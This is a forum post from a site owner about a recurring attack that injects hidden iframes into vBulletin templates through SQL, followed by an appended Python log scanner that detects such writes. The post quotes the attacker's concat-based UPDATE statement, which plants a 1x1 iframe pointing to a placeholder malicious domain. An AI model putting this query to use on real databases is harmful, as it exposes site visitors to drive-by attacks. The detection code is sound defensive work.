11-14-2009, 12:31 PM
Join Date: Nov 2008
I've been suffering from an iframe attack for 10 days. My site is mainly a vBulletin site with a few addons. This is not a typical iframe injection into PHP files, and I've already followed every iframe cleaning and iframe protection related suggestion (including formatting my PC, scanning my servers, changing my password and restoring backups).
I've also disabled custom addon scripts. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.
The iframe is being injected via SQL queries. Sample code from my MySQL logs:
16905 Query UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template), template_un=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template_un) where title='header'
Now another big forum site is infected, too. I'm not alone. AND YES, THEY ARE USING LITESPEED like me!
This is the only way I can slow down or stop the hacker-virus for a while:
- I remove the old database user from my database.
- I create a new database user.
- I edit my config.php and upload it to the server.
This way it doesn't add an iframe to my header template for a few hours, but then the same thing happens.
Here's my theory: They can view my config.php as text and retrieve my database password from there.
There are no traces in the access logs, and there are no edited/updated PHP files. I guess they simply have database access, as I said above, and they can easily execute queries.
Please help ASAP!
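
An added example, not part of the original post: a Python scan of a MySQL general query log for writes that put an `<iframe>` into the `template` table, reporting the thread id and the `Connect` entry (database user and host) that issued them. It assumes the classic general-log layout (optional timestamp, thread id, command, argument); the sample log, `forum_user` and `forum_db` are constructed.

```python
import re

# General query log entry: optional timestamp, thread id, command, argument.
ENTRY = re.compile(r"^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?(\d+)\s+(\w+)\s+(.*)$")
# Writes to the `template` table (table and column names as in the logged query).
TEMPLATE_WRITE = re.compile(r"^(?:UPDATE|INSERT\s+INTO|REPLACE\s+INTO)\s+`?template`?\b", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
# A 0- or 1-pixel dimension or CSS hiding marks a frame meant to be invisible.
HIDDEN = re.compile(r"\b(?:width|height)\s*=\s*[\\'\"]*[01]\b|display\s*:\s*none", re.I)
TITLE = re.compile(r"\btitle\s*=\s*'([^']*)'", re.I)

def find_template_iframe_writes(lines):
    """Return one finding per Query entry that writes an <iframe> into `template`."""
    connects, findings = {}, []
    for lineno, line in enumerate(lines, 1):
        m = ENTRY.match(line)
        if not m:
            continue
        thread, cmd, arg = int(m.group(1)), m.group(2).lower(), m.group(3)
        if cmd == "connect":
            connects[thread] = arg          # "user@host on database"
            continue
        if cmd != "query" or not TEMPLATE_WRITE.match(arg):
            continue
        tags = IFRAME.findall(arg)
        if tags:
            title = TITLE.search(arg)
            findings.append({
                "line": lineno,
                "thread": thread,
                "connected_as": connects.get(thread),   # None if Connect is outside this log slice
                "title": title.group(1) if title else None,
                "hidden": any(HIDDEN.search(t) for t in tags),
            })
    return findings

# Constructed sample log; only the shape of the UPDATE statement comes from the post.
SAMPLE_LOG = r"""
091114 12:01:07 16904 Connect forum_user@localhost on forum_db
                16904 Query SELECT template FROM template WHERE title='header'
091114 12:01:09 16905 Connect forum_user@localhost on forum_db
                16905 Query UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template) where title='header'
                16905 Query UPDATE template SET template='<div>footer</div>' WHERE title='footer'
""".strip().splitlines()

if __name__ == "__main__":
    for f in find_template_iframe_writes(SAMPLE_LOG):
        print(f)
```

The `connected_as` value shows which database account and client host the injecting connection used, which is the evidence needed to test the stolen-credentials theory against the web server's own connections.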